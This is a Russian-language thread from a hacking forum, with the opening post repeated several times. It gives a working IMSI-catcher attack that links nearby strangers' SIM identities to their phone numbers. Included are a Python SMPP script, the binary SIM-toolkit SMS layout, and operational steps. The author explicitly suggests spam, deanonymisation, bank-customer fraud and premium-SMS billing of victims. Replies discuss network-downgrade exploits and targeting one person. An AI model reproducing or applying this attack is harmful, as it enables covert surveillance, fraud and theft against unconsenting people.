• XSS.stack #1 – первый литературный журнал от юзеров форума

GSM Как получить номера телефонов окружающих людей

gliderexpert

CPU register
Забанен
Регистрация
17.02.2021
Сообщения
1 440
Решения
1
Реакции
2 336
Пожалуйста, обратите внимание, что пользователь заблокирован
Всем хай! И снова пенетрируем мобильные телефоны окружающих )

Как получить телефонные номера всех двуногих людей, которые осмелились вторгнуться в ваше личное пространство!?

Описываемый мною метод позволяет сопоставить уникальный идентификатор СИМ-карты (IMSI) с фактическим номером телефона (MSISDN) цели, находящейся в пределах радиуса действия фейковой базовой станции.

Для чего это может быть нужно?
Например, Вы владелец магазина и хотите узнать номера телефонов всех посетителей, чтобы разослать им целевой спам по мессенджерам.
Или напомнить о себе СМСкой с промокодом через пару дней после того как зарегистрировали данного человека в своем шопе.
Или "сдеанонить" человека, находящегося рядом - пробить по базам данных, используя его тел.номер.
Или получить номера телефонов всех посетителей банка...
Или использовать добытую информацию в целях соц.инженерии
("Здравствуйте Иван Иваныч! Вы пользовались сегодня нашим банкоматом на улице C001H4ck3r Street ?
К сожалению, сразу после того как вы ушли - ровно в 6ч 66мин в нашей системе была зафиксирована утечка информации. Вы должны срочно перевести все $ на безопасный счет, иначе злые хакеры взорвут ваш айфон :)
")
Или просто отправить смс с чужого телефона на свой платный номер )
Или... все зависит от вашей фантазии!

Итак, первым делом Вам понадобится IMSI-catcher (эмулятор базовой станции), позволяющий отправлять на зарегистрированные в его сети мобильные телефоны бинарные СМС.
На этом моменте я подробно останавливаться не буду, так как тема достаточно хорошо описана в интернете и вариантов тут много - osmocom, yate bts, openbts и т.д.
В качестве железа можно использовать SDR с правильной "обвязкой" или моторолу с118 с перепаяными фильтрами.

Вторая часть успеха - "левый" андроид смартфон с "левой" симкой, но обязательно рабочий (на симке должен быть положительный баланс) и способный принимать СМС.

Смысл атаки в том, что мы заставим все зарегистрировавшиеся на нашем imsi catcher'е телефоны - отправить СМСку на наш телефон, но отправить ее уже через сеть оператора - таким образом мы получим номер телефона цели с которого отправлена "контрольная" смс.
В этом нам поможет механизм Delivery Report - суть в том, что для бинарный СМС можно сконфигурировать заголовок таким образом, что при ее получении телефон будет должен отправить отчет о доставке на заданный нами номер. Конечно - пока телефон висит на фейковой сети imsi catcher'а , он не сможет этого сделать.
А вот если кетчер выключить сразу после отправки бинарной смс - телефон сделает реселект на настоящую сеть оператора и СМСка уже будет отправлена через механизмы HLR-AuC оператора!

Ловите приватный скрипт на Python'е для отправки такой СМСки:
Python:
#!/usr/bin/env python3
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

import smpplib.gsm
import smpplib.client
import smpplib.consts

def send_message(source, dest):
    client = smpplib.client.Client('127.0.0.1', 2775)
    client.set_message_sent_handler(
        lambda pdu: sys.stdout.write('sent {} {}\n'.format(pdu.sequence, pdu.message_id)))
    client.set_message_received_handler(
        lambda pdu: sys.stdout.write('delivered {}\n'.format(pdu.receipted_message_id)))
    client.connect()
    client.bind_transceiver(system_id='OSMO-SMPP', password='1234')
    string =  '\x02\x70\x00\x00\x0e\x0d\x00\x21\x00\x00\xb2\x00\x00\xaa\xbb\xcc\xdd\xee\x00'
    coding =  0xf6
    pdu = client.send_message(
            msg_type=smpplib.consts.SMPP_MSGTYPE_USERACK,
            source_addr_ton=smpplib.consts.SMPP_TON_INTL,
            source_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            source_addr=source,
            dest_addr_ton=smpplib.consts.SMPP_TON_INTL,
            dest_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            destination_addr=dest,
            short_message=string,
            data_coding= sms_cod,
            protocol_id = 0x41,
            esm_class=smpplib.consts.SMPP_GSMFEAT_UDHI,
            registered_delivery=False,
        )
 

if __name__ == "__main__":
    source = sys.argv[1]
    dest = sys.argv[2]
    send_message(source, dest)



Разберем подробнее.
Этот скрипт отправляет бинарное СМС сообщение через интерфейс SMPP фейковой базовой станции, со следующими байтами информации:

010007919 32350591211 0026 44 0c919 32390026xxxx 7ff6117042711404e113 0270 00000e0d 0021 0000b20000aabbccddee00
где:
32350591211 - Номер смс- центра
44 - Тип сообщения - SMS-DELIVER
32390026xxxx - Тел.номер куда прислать отчет о доставке
0270 - SIM toolkit security header
0021 - SIM toolkit security parameter indicator

aabbccddee - любая информация. Нужна для того чтобы пакет данных имел правильный размер.
Сюда Вы можете вписать например уникальный идентификатор цели - последние 4 цифры IMSI и т.п.


Методика работы - включаем базовую станцию, ждем когда на ней зарегистрируются нужные абоненты.
Вопрос настройки БС, редиректора и прочего в рамках этого сообщения я не рассматриваю.
Нужно сделать так чтобы абоненты на ней регистрировались )

После получения нужного числа абонентов - присваиваем им уникальные номера внутри нашей БСки.

Далее рассылаем на эти номера бинарные СМС командой python3 sms.py 79161234567 123
где 7916... - номер телефона куда придет ответная смс
123 - уникальный номер абонента внутри нашей БСки

Нужно отправить все сообщения в течении максимум 5 секунд (делать это нужно разумеется не вручную, а специально написанным скриптом). После чего выключите питание передатчика базовой станции.
Через 10 секунд на Ваш телефон (791612345678) начнут приходить ответные бинарные СМС от счастливых получателей Вашего месседжа.
Но, так как ответные СМС тоже бинарные - в инбоксе вы их не увидете, но можно прочитать любой программой, показывающей RAW PDU SMS (много готового опенсорса на гитхабе). В тексте этой смски будет код aabbccdd (или тот id который вы впишите), а отправлена она будет с номера телефона цели :D

Телефон-цель не покажет ничего на экране, но факт отправки смс на ваш номер будет зарегистрирован в биллинге оператора, поэтому если дело вдруг дойдет до практических экспериментов - будьте осторожны и не используйте в качестве телефона-индикатора свой собственный телефон.

Разумеется, все вышесказанное можно тестировать только в клетке Фарадея, используя свои телефоны и надев шапочку из фольги (если шапочка сильно нагревается - рекомендуется уменьшить мощность передатчика).
 
Всем хай! И снова пенетрируем мобильные телефоны окружающих )

Как получить телефонные номера всех двуногих людей, которые осмелились вторгнуться в ваше личное пространство!?

Описываемый мною метод позволяет сопоставить уникальный идентификатор СИМ-карты (IMSI) с фактическим номером телефона (MSISDN) цели, находящейся в пределах радиуса действия фейковой базовой станции.

Для чего это может быть нужно?
Например, Вы владелец магазина и хотите узнать номера телефонов всех посетителей, чтобы разослать им целевой спам по мессенджерам.
Или напомнить о себе СМСкой с промокодом через пару дней после того как зарегистрировали данного человека в своем шопе.
Или "сдеанонить" человека, находящегося рядом - пробить по базам данных, используя его тел.номер.
Или получить номера телефонов всех посетителей банка...
Или использовать добытую информацию в целях соц.инженерии
("Здравствуйте Иван Иваныч! Вы пользовались сегодня нашим банкоматом на улице C001H4ck3r Street ?
К сожалению, сразу после того как вы ушли - ровно в 6ч 66мин в нашей системе была зафиксирована утечка информации. Вы должны срочно перевести все $ на безопасный счет, иначе злые хакеры взорвут ваш айфон :)
")
Или просто отправить смс с чужого телефона на свой платный номер )
Или... все зависит от вашей фантазии!

Итак, первым делом Вам понадобится IMSI-catcher (эмулятор базовой станции), позволяющий отправлять на зарегистрированные в его сети мобильные телефоны бинарные СМС.
На этом моменте я подробно останавливаться не буду, так как тема достаточно хорошо описана в интернете и вариантов тут много - osmocom, yate bts, openbts и т.д.
В качестве железа можно использовать SDR с правильной "обвязкой" или моторолу с118 с перепаяными фильтрами.

Вторая часть успеха - "левый" андроид смартфон с "левой" симкой, но обязательно рабочий (на симке должен быть положительный баланс) и способный принимать СМС.

Смысл атаки в том, что мы заставим все зарегистрировавшиеся на нашем imsi catcher'е телефоны - отправить СМСку на наш телефон, но отправить ее уже через сеть оператора - таким образом мы получим номер телефона цели с которого отправлена "контрольная" смс.
В этом нам поможет механизм Delivery Report - суть в том, что для бинарный СМС можно сконфигурировать заголовок таким образом, что при ее получении телефон будет должен отправить отчет о доставке на заданный нами номер. Конечно - пока телефон висит на фейковой сети imsi catcher'а , он не сможет этого сделать.
А вот если кетчер выключить сразу после отправки бинарной смс - телефон сделает реселект на настоящую сеть оператора и СМСка уже будет отправлена через механизмы HLR-AuC оператора!

Ловите приватный скрипт на Python'е для отправки такой СМСки:
Python:
#!/usr/bin/env python3
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

import smpplib.gsm
import smpplib.client
import smpplib.consts

def send_message(source, dest):
    client = smpplib.client.Client('127.0.0.1', 2775)
    client.set_message_sent_handler(
        lambda pdu: sys.stdout.write('sent {} {}\n'.format(pdu.sequence, pdu.message_id)))
    client.set_message_received_handler(
        lambda pdu: sys.stdout.write('delivered {}\n'.format(pdu.receipted_message_id)))
    client.connect()
    client.bind_transceiver(system_id='OSMO-SMPP', password='1234')
    string =  '\x02\x70\x00\x00\x0e\x0d\x00\x21\x00\x00\xb2\x00\x00\xaa\xbb\xcc\xdd\xee\x00'
    coding =  0xf6
    pdu = client.send_message(
            msg_type=smpplib.consts.SMPP_MSGTYPE_USERACK,
            source_addr_ton=smpplib.consts.SMPP_TON_INTL,
            source_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            source_addr=source,
            dest_addr_ton=smpplib.consts.SMPP_TON_INTL,
            dest_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            destination_addr=dest,
            short_message=string,
            data_coding= sms_cod,
            protocol_id = 0x41,
            esm_class=smpplib.consts.SMPP_GSMFEAT_UDHI,
            registered_delivery=False,
        )
  

if __name__ == "__main__":
    source = sys.argv[1]
    dest = sys.argv[2]
    send_message(source, dest)



Разберем подробнее.
Этот скрипт отправляет бинарное СМС сообщение через интерфейс SMPP фейковой базовой станции, со следующими байтами информации:

010007919 32350591211 0026 44 0c919 32390026xxxx 7ff6117042711404e113 0270 00000e0d 0021 0000b20000aabbccddee00
где:
32350591211 - Номер смс- центра
44 - Тип сообщения - SMS-DELIVER
32390026xxxx - Тел.номер куда прислать отчет о доставке
0270 - SIM toolkit security header
0021 - SIM toolkit security parameter indicator

aabbccddee - любая информация. Нужна для того чтобы пакет данных имел правильный размер.
Сюда Вы можете вписать например уникальный идентификатор цели - последние 4 цифры IMSI и т.п.


Методика работы - включаем базовую станцию, ждем когда на ней зарегистрируются нужные абоненты.
Вопрос настройки БС, редиректора и прочего в рамках этого сообщения я не рассматриваю.
Нужно сделать так чтобы абоненты на ней регистрировались )

После получения нужного числа абонентов - присваиваем им уникальные номера внутри нашей БСки.

Далее рассылаем на эти номера бинарные СМС командой python3 sms.py 79161234567 123
где 7916... - номер телефона куда придет ответная смс
123 - уникальный номер абонента внутри нашей БСки

Нужно отправить все сообщения в течении максимум 5 секунд (делать это нужно разумеется не вручную, а специально написанным скриптом). После чего выключите питание передатчика базовой станции.
Через 10 секунд на Ваш телефон (791612345678) начнут приходить ответные бинарные СМС от счастливых получателей Вашего месседжа.
Но, так как ответные СМС тоже бинарные - в инбоксе вы их не увидете, но можно прочитать любой программой, показывающей RAW PDU SMS (много готового опенсорса на гитхабе). В тексте этой смски будет код aabbccdd (или тот id который вы впишите), а отправлена она будет с номера телефона цели :D

Телефон-цель не покажет ничего на экране, но факт отправки смс на ваш номер будет зарегистрирован в биллинге оператора, поэтому если дело вдруг дойдет до практических экспериментов - будьте осторожны и не используйте в качестве телефона-индикатора свой собственный телефон.

Разумеется, все вышесказанное можно тестировать только в клетке Фарадея, используя свои телефоны и надев шапочку из фольги (если шапочка сильно нагревается - рекомендуется уменьшить мощность передатчика).
Как можно защититься от этого? Или понять что телефон подключился к фейковой станции?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Как можно защититься от этого? Или понять что телефон подключился к фейковой станции?

Защита - единственный способ - включить на телефоне режим 4G Only.
Но и в 4g возможно получить некоторые идентификаторы телефона и даже сдеанонить точное местоположение.

Как обнаружить фейковую БСку - это сложная тема, достойная отдельной статьи. Кратко, фейк БС можно обнаружить по завышенным параметрам Cell Reselect Offset, но если оператор грамотный - то там тоже все красиво может быть.

А в случае описанной темы - телефон на фейковой БСке висит не больше чем 1-2 секунды и заметить что либо вообще нереально.
 
Последнее редактирование:
Защита - единственный способ - включить на телефоне режим 4G Only.
Но и в 4g возможно получить некоторые идентификаторы телефона и даже сдеанонить точное местоположение.

Как обнаружить фейковую БСку - это сложная тема, достойная отдельной статьи. Кратко, фейк БС можно обнаружить по завышенным параметрам Cell Reselect Offset, но если оператор грамотный - то там тоже все красиво может быть.

А в случае описанной темы - телефон на фейковой БСке висит не больше чем 1-2 секунды и заметить что либо вообще нереально.
А такая прога как gsm spy finder актуальна в помощи показывания подключения к фейк БСкам?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Когда "школьники" с моторолой играются и не знают что в конфиги вбивать и в каких местах осмоком патчить - да, spy finder покажет фейк БС.

Если же все грамотно сделать то фейк БСку на стороне клиента - никак не обнаружить )
Но - оператор будет в любом случае видеть "лишнюю" БСку, базируясь на отчетах measurement reports мобилок которые находятся рядом.
Другое дело - что все понимают кому эти БСки обычно принадлежат, и оператор вряд ли захочет фейк БСкой сильно интересоваться и выявлять ее принадлежность ))
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Дополню тему описанием регистров SIM toolkit security header . Желтым выделены те значения, которые нужно установить для реализации описываемой атаки.

sec parameter.png

sec parameter 2.png




Вот так в Wireshark выглядит отправка "контрольной" СМСки, которая провоцирует телефон-цель на автоматическую отправку СМС через "настоящую" сеть оператора, со своего номера (и за свой счет).
Attacker MSISDN - номер телефона КУДА отправлять СМС. Он должен находиться в данный момент в сети и быть доступен для приема СМС.
Но номер при этом может быть роуминговый или контентный - это не важно, за все платит "клиент".
wireshark.png


Соответственно на наш номер телефона - придет смска от цели в таком формате:

submit.gif


submit2.png



Теория атаки очень малоизвестная, почти все уверены что IMSI-catcher не может получить номер телефона цели, но к счастью это не так.
Практики с работающим опенсорс скриптом до настоящего момента времени в интернете не было. Хотя китайцы продают девайс для такой атаки за 40к $ )
Использование принудительной отправки смс с чужого номера - совершенно свежая и незаюзанная на данный момент времени история.
Я опубликовал подробности теории и рабочий код скрипта для генерации такой смски, т.к. убежден что информация должна быть общедоступной,к тому же самому
мне эта тема с delivery report уже не так нужна в связи с переходом на более интересные вещи )
 
Последнее редактирование:
Защита - единственный способ - включить на телефоне режим 4G Only.
Но и в 4g возможно получить некоторые идентификаторы телефона и даже сдеанонить точное местоположение.

Как обнаружить фейковую БСку - это сложная тема, достойная отдельной статьи. Кратко, фейк БС можно обнаружить по завышенным параметрам Cell Reselect Offset, но если оператор грамотный - то там тоже все красиво может быть.

А в случае описанной темы - телефон на фейковой БСке висит не больше чем 1-2 секунды и заметить что либо вообще нереально.
Requires 2g?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Requires 2g?

Yes, but i have easy method for redirecting phones from 4G (LTE) to 2G insecure network - https://xss.pro/threads/60817/
 
В каком радиусе может работать imsi catcher, на большом LimeSDR, в чистом поле? И допустим если стоит задача получить imsi + msisdn определенного человека, как фильтровать его от других.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
В каком радиусе может работать imsi catcher, на большом LimeSDR, в чистом поле?

Без усилителей - метров 20.
С правильными усилителями - 3...5км.
Речь про телефоны в режиме 2G. Если "в чистом поле" есть сеть 4г, то радиус будет зависеть еще и от используемого метода редиректа 4г-2г и тут уже одним лаймом не обойтись.

И допустим если стоит задача получить imsi + msisdn определенного человека, как фильтровать его от других.

Определить сначала его imsi, например "поймав" телефон этого человека 2 раза в разных локациях, а потом связать imsi с msisdn.
 
палишь приватные темы...
причем при правильной модификации можно серьезных дров наломать
И, кстати, не на всех телефонах жертв работать будет, насколько я понимаю, верно?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
причем при правильной модификации можно серьезных дров наломать

С этого места поподробнее )) Можно в лс.

И, кстати, не на всех телефонах жертв работать будет, насколько я понимаю, верно?

На всех телефонах с относительно новыми симками. Этот "эксплоит" использует особенность прошивки сим карты.
 
Я понимаю структуру смс, и подобное тоже делал и с этим эксплоитом и с другими. Не на всех картах срабатывал, спрашивал, говорили, что слишком старые не работают и на некоторых новых не хочет.
А по поводу дров напишу немного попозже в личку )
 
Без усилителей - метров 20.
С правильными усилителями - 3...5км.
Речь про телефоны в режиме 2G. Если "в чистом поле" есть сеть 4г, то радиус будет зависеть еще и от используемого метода редиректа 4г-2г и тут уже одним лаймом не обойтись.



Определить сначала его imsi, например "поймав" телефон этого человека 2 раза в разных локациях, а потом связать imsi с msisdn.
Are there any implications presented with 5g?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Yes, i have "exploit" for downgrade attack from 5G (NR) to 4G. I tested it on MTS cellular network in Russia.
 
Как можно защититься от этого? Или понять что телефон подключился к фейковой станции?
Есть софтина на тел которая детектив фейковые станции. У них нету шифрования а5. Хочу реализовать поднятие черезе yate bts получилось только поднять а подмену не хочет. Может из-за того что антенны слабые были. У кого такое выходило?

Всем хай! И снова пенетрируем мобильные телефоны окружающих )

Как получить телефонные номера всех двуногих людей, которые осмелились вторгнуться в ваше личное пространство!?

Описываемый мною метод позволяет сопоставить уникальный идентификатор СИМ-карты (IMSI) с фактическим номером телефона (MSISDN) цели, находящейся в пределах радиуса действия фейковой базовой станции.

Для чего это может быть нужно?
Например, Вы владелец магазина и хотите узнать номера телефонов всех посетителей, чтобы разослать им целевой спам по мессенджерам.
Или напомнить о себе СМСкой с промокодом через пару дней после того как зарегистрировали данного человека в своем шопе.
Или "сдеанонить" человека, находящегося рядом - пробить по базам данных, используя его тел.номер.
Или получить номера телефонов всех посетителей банка...
Или использовать добытую информацию в целях соц.инженерии
("Здравствуйте Иван Иваныч! Вы пользовались сегодня нашим банкоматом на улице C001H4ck3r Street ?
К сожалению, сразу после того как вы ушли - ровно в 6ч 66мин в нашей системе была зафиксирована утечка информации. Вы должны срочно перевести все $ на безопасный счет, иначе злые хакеры взорвут ваш айфон :)
")
Или просто отправить смс с чужого телефона на свой платный номер )
Или... все зависит от вашей фантазии!

Итак, первым делом Вам понадобится IMSI-catcher (эмулятор базовой станции), позволяющий отправлять на зарегистрированные в его сети мобильные телефоны бинарные СМС.
На этом моменте я подробно останавливаться не буду, так как тема достаточно хорошо описана в интернете и вариантов тут много - osmocom, yate bts, openbts и т.д.
В качестве железа можно использовать SDR с правильной "обвязкой" или моторолу с118 с перепаяными фильтрами.

Вторая часть успеха - "левый" андроид смартфон с "левой" симкой, но обязательно рабочий (на симке должен быть положительный баланс) и способный принимать СМС.

Смысл атаки в том, что мы заставим все зарегистрировавшиеся на нашем imsi catcher'е телефоны - отправить СМСку на наш телефон, но отправить ее уже через сеть оператора - таким образом мы получим номер телефона цели с которого отправлена "контрольная" смс.
В этом нам поможет механизм Delivery Report - суть в том, что для бинарный СМС можно сконфигурировать заголовок таким образом, что при ее получении телефон будет должен отправить отчет о доставке на заданный нами номер. Конечно - пока телефон висит на фейковой сети imsi catcher'а , он не сможет этого сделать.
А вот если кетчер выключить сразу после отправки бинарной смс - телефон сделает реселект на настоящую сеть оператора и СМСка уже будет отправлена через механизмы HLR-AuC оператора!

Ловите приватный скрипт на Python'е для отправки такой СМСки:
Python:
#!/usr/bin/env python3
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

import smpplib.gsm
import smpplib.client
import smpplib.consts

def send_message(source, dest):
    client = smpplib.client.Client('127.0.0.1', 2775)
    client.set_message_sent_handler(
        lambda pdu: sys.stdout.write('sent {} {}\n'.format(pdu.sequence, pdu.message_id)))
    client.set_message_received_handler(
        lambda pdu: sys.stdout.write('delivered {}\n'.format(pdu.receipted_message_id)))
    client.connect()
    client.bind_transceiver(system_id='OSMO-SMPP', password='1234')
    string =  '\x02\x70\x00\x00\x0e\x0d\x00\x21\x00\x00\xb2\x00\x00\xaa\xbb\xcc\xdd\xee\x00'
    coding =  0xf6
    pdu = client.send_message(
            msg_type=smpplib.consts.SMPP_MSGTYPE_USERACK,
            source_addr_ton=smpplib.consts.SMPP_TON_INTL,
            source_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            source_addr=source,
            dest_addr_ton=smpplib.consts.SMPP_TON_INTL,
            dest_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            destination_addr=dest,
            short_message=string,
            data_coding= sms_cod,
            protocol_id = 0x41,
            esm_class=smpplib.consts.SMPP_GSMFEAT_UDHI,
            registered_delivery=False,
        )
 

if __name__ == "__main__":
    source = sys.argv[1]
    dest = sys.argv[2]
    send_message(source, dest)



Разберем подробнее.
Этот скрипт отправляет бинарное СМС сообщение через интерфейс SMPP фейковой базовой станции, со следующими байтами информации:

010007919 32350591211 0026 44 0c919 32390026xxxx 7ff6117042711404e113 0270 00000e0d 0021 0000b20000aabbccddee00
где:
32350591211 - Номер смс- центра
44 - Тип сообщения - SMS-DELIVER
32390026xxxx - Тел.номер куда прислать отчет о доставке
0270 - SIM toolkit security header
0021 - SIM toolkit security parameter indicator

aabbccddee - любая информация. Нужна для того чтобы пакет данных имел правильный размер.
Сюда Вы можете вписать например уникальный идентификатор цели - последние 4 цифры IMSI и т.п.


Методика работы - включаем базовую станцию, ждем когда на ней зарегистрируются нужные абоненты.
Вопрос настройки БС, редиректора и прочего в рамках этого сообщения я не рассматриваю.
Нужно сделать так чтобы абоненты на ней регистрировались )

После получения нужного числа абонентов - присваиваем им уникальные номера внутри нашей БСки.

Далее рассылаем на эти номера бинарные СМС командой python3 sms.py 79161234567 123
где 7916... - номер телефона куда придет ответная смс
123 - уникальный номер абонента внутри нашей БСки

Нужно отправить все сообщения в течении максимум 5 секунд (делать это нужно разумеется не вручную, а специально написанным скриптом). После чего выключите питание передатчика базовой станции.
Через 10 секунд на Ваш телефон (791612345678) начнут приходить ответные бинарные СМС от счастливых получателей Вашего месседжа.
Но, так как ответные СМС тоже бинарные - в инбоксе вы их не увидете, но можно прочитать любой программой, показывающей RAW PDU SMS (много готового опенсорса на гитхабе). В тексте этой смски будет код aabbccdd (или тот id который вы впишите), а отправлена она будет с номера телефона цели :D

Телефон-цель не покажет ничего на экране, но факт отправки смс на ваш номер будет зарегистрирован в биллинге оператора, поэтому если дело вдруг дойдет до практических экспериментов - будьте осторожны и не используйте в качестве телефона-индикатора свой собственный телефон.

Разумеется, все вышесказанное можно тестировать только в клетке Фарадея, используя свои телефоны и надев шапочку из фольги (если шапочка сильно нагревается - рекомендуется уменьшить мощность передатчика).
Автору спасибо. Уже понял что тема интересная буду тестить. (ПС самое интересное направление по веба
)

Yes, i have "exploit" for downgrade attack from 5G (NR) to 4G. I tested it on MTS cellular network in Russia.
how u realize that
 
Пожалуйста, обратите внимание, что пользователь заблокирован
фейковые станции. У них нету шифрования а5.

Вы ошибаетесь.
 
Ничего не получиться по одной простой причине, перекинуть на свою микровышку пользователей у тебя но получиться по тому что сигнал который выдает та же моторола не достаточно силён и не поддерживает современные протоколы, а даже если ты каждого посетителя возьмёш телефон и вручную перекинешь на себя, то смс ты сможешь отправить только в тот момент когда они подключены к тебе, так как твоя сота не выведена в эфир, проверено на деле
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх